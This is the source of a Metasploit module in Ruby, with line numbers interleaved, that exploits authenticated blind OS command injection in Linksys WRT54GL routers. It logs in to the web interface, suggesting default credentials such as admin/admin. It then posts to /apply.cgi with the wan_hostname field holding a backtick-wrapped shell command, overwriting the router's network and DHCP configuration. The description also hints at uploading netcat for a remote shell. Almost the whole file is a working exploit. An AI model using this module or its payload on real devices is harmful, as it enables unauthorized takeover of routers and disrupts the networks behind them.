1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::HttpClient
8

9
  def initialize(info = {})
10
    super(
11
      update_info(
12
        info,
13
        'Name' => 'Linksys WRT54GL Remote Command Execution',
14
        'Description' => %q{
15
          Some Linksys Routers are vulnerable to OS Command injection.
16
          You will need credentials to the web interface to access the vulnerable part
17
          of the application.
18
          Default credentials are always a good starting point. admin/admin or admin
19
          and blank password could be a first try.
20
          Note: This is a blind OS command injection vulnerability. This means that
21
          you will not see any output of your command. Try a ping command to your
22
          local system and observe the packets with tcpdump (or equivalent) for a first test.
23

24
          Hint: To get a remote shell you could upload a netcat binary and exec it.
25
          WARNING: this module will overwrite network and DHCP configuration.
26
        },
27
        'Author' => [ 'Michael Messner <devnull[at]s3cur1ty.de>' ],
28
        'License' => MSF_LICENSE,
29
        'References' => [
30
          [ 'CVE', '2023-31742' ],
31
          [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-01' ],
32
          [ 'URL', 'http://www.s3cur1ty.de/attacking-linksys-wrt54gl' ],
33
          [ 'EDB', '24202' ],
34
          [ 'BID', '57459' ],
35
          [ 'OSVDB', '89421' ]
36
        ],
37
        'DisclosureDate' => '2013-01-18',
38
        'Notes' => {
39
          'Stability' => [CRASH_SAFE],
40
          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],
41
          'Reliability' => []
42
        }
43
      )
44
    )
45

46
    register_options(
47
      [
48
        Opt::RPORT(80),
49
        OptString.new('TARGETURI', [ true, 'PATH to OS Command Injection', '/apply.cgi']),
50
        OptString.new('HttpUsername', [ true, 'User to login with', 'admin']),
51
        OptString.new('HttpPassword', [ false, 'Password to login with', 'password']),
52
        OptString.new('CMD', [ true, 'The command to execute', 'ping 127.0.0.1']),
53
        OptString.new('NETMASK', [ false, 'LAN Netmask of the router', '255.255.255.0']),
54
        OptAddress.new('LANIP', [ false, 'LAN IP address of the router (default is RHOST)']),
55
        OptString.new('ROUTER_NAME', [ false, 'Name of the router', 'cisco']),
56
        OptString.new('WAN_DOMAIN', [ false, 'WAN Domain Name', 'test']),
57
        OptString.new('WAN_MTU', [ false, 'WAN MTU', '1500'])
58
      ]
59
    )
60
  end
61

62
  # If the user configured LANIP, use it. Otherwise, use RHOST.
63
  # NB: This presumes a dotted quad ip address.
64
  def lan_ip
65
    if datastore['LANIP'].to_s.empty?
66
      datastore['RHOST']
67
    else
68
      datastore['LANIP']
69
    end
70
  end
71

72
  def run
73
    # setting up some basic variables
74
    uri = datastore['TARGETURI']
75
    user = datastore['HttpUsername']
76
    rhost = datastore['RHOST']
77
    netmask = datastore['NETMASK']
78
    routername = datastore['ROUTER_NAME']
79
    wandomain = datastore['WAN_DOMAIN']
80
    wanmtu = datastore['WAN_MTU']
81

82
    ip = lan_ip.split('.')
83

84
    if datastore['HttpPassword'].nil?
85
      pass = ''
86
    else
87
      pass = datastore['HttpPassword']
88
    end
89

90
    print_status("Trying to login with #{user} / #{pass}")
91

92
    begin
93
      res = send_request_cgi({
94
        'uri'	=> uri,
95
        'method' => 'GET',
96
        'authorization' => basic_auth(user, pass)
97
      })
98

99
      unless (res.is_a? Rex::Proto::Http::Response)
100
        vprint_error("#{rhost} not responding")
101
        return :abort
102
      end
103

104
      if (res.code == 404)
105
        print_error('Not Found page returned')
106
        return :abort
107
      end
108

109
      if [200, 301, 302].include?(res.code)
110
        print_good("SUCCESSFUL LOGIN. '#{user}' : '#{pass}'")
111
      else
112
        print_error("NO SUCCESSFUL LOGIN POSSIBLE. '#{user}' : '#{pass}'")
113
        return :abort
114
      end
115
    rescue ::Rex::ConnectionError
116
      vprint_error("#{rhost} - Failed to connect to the web server")
117
      return :abort
118
    end
119

120
    cmd = datastore['CMD']
121

122
    print_status('Sending remote command: ' + cmd)
123

124
    # cmd = Rex::Text.uri_encode(datastore['CMD'])
125
    # original Post Request:
126
    # data_cmd = "submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&"
127
    # data_cmd << "lan_ipaddr=4&wait_time=0&need_reboot=0&ui_language=de&wan_proto=dhcp&router_name=#{routername}&"
128
    # data_cmd << "wan_hostname=`#{cmd}`&wan_domain=#{wandomain}&mtu_enable=1&wan_mtu=#{wanmtu}&lan_ipaddr_0=#{ip[0]}&"
129
    # data_cmd << "lan_ipaddr_1=#{ip[1]}&lan_ipaddr_2=#{ip[2]}&lan_ipaddr_3=#{ip[3]}&lan_netmask=#{netmask}&"
130
    # data_cmd << "lan_proto=dhcp&dhcp_check=&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&"
131
    # data_cmd << "wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&"
132
    # data_cmd << "wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&"
133
    # data_cmd << "wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1"
134

135
    vprint_status("using the following target URL: #{uri}")
136

137
    begin
138
      res = send_request_cgi({
139
        'uri'	=> uri,
140
        'method' => 'POST',
141
        'authorization' => basic_auth(user, pass),
142
        # 'data' => data_cmd,
143

144
        'vars_post' => {
145
          'submit_button' => 'index',
146
          'change_action' => '1',
147
          'submit_type' => '1',
148
          'action' => 'Apply',
149
          'now_proto' => 'dhcp',
150
          'daylight_time' => '1',
151
          'lan_ipaddr' => '4',
152
          'wait_time' => '0',
153
          'need_reboot' => '0',
154
          'ui_language' => 'de',
155
          'wan_proto' => 'dhcp',
156
          'router_name' => routername.to_s,
157
          'wan_hostname' => "`#{cmd}`",
158
          'wan_domain' => wandomain.to_s,
159
          'mtu_enable' => '1',
160
          'wan_mtu' => wanmtu.to_s,
161
          'lan_ipaddr_0' => ip[0].to_s,
162
          'lan_ipaddr_1' => ip[1].to_s,
163
          'lan_ipaddr_2' => ip[2].to_s,
164
          'lan_ipaddr_3' => ip[3].to_s,
165
          'lan_netmask' => netmask.to_s,
166
          'lan_proto' => 'dhcp',
167
          'dhcp_check' => '1',
168
          'dhcp_start' => '100',
169
          'dhcp_num' => '50',
170
          'dhcp_lease' => '0',
171
          'wan_dns' => '4',
172
          'wan_dns0_0' => '0',
173
          'wan_dns0_1' => '0',
174
          'wan_dns0_2' => '0',
175
          'wan_dns0_3' => '0',
176
          'wan_dns1_0' => '0',
177
          'wan_dns1_1' => '0',
178
          'wan_dns1_2' => '0',
179
          'wan_dns1_3' => '0',
180
          'wan_dns2_0' => '0',
181
          'wan_dns2_1' => '0',
182
          'wan_dns2_2' => '0',
183
          'wan_dns2_3' => '0',
184
          'wan_wins' => '4',
185
          'wan_wins_0' => '0',
186
          'wan_wins_1' => '0',
187
          'wan_wins_2' => '0',
188
          'wan_wins_3' => '0',
189
          'time_zone' => '-08+1+1',
190
          '_daylight_time' => '1'
191
        }
192
      })
193
    rescue ::Rex::ConnectionError
194
      vprint_error("#{rhost} - Failed to connect to the web server")
195
      return :abort
196
    end
197

198
    if res && (res.code == 200)
199
      print_status('Blind Exploitation - Response expected')
200
    else
201
      print_error("Blind Exploitation - Response don't expected")
202
    end
203
    print_status('Blind Exploitation - wait around 10 seconds until the configuration gets applied and your command gets executed')
204
    print_status('Blind Exploitation - unknown Exploitation state')
205
  end
206
end
207

208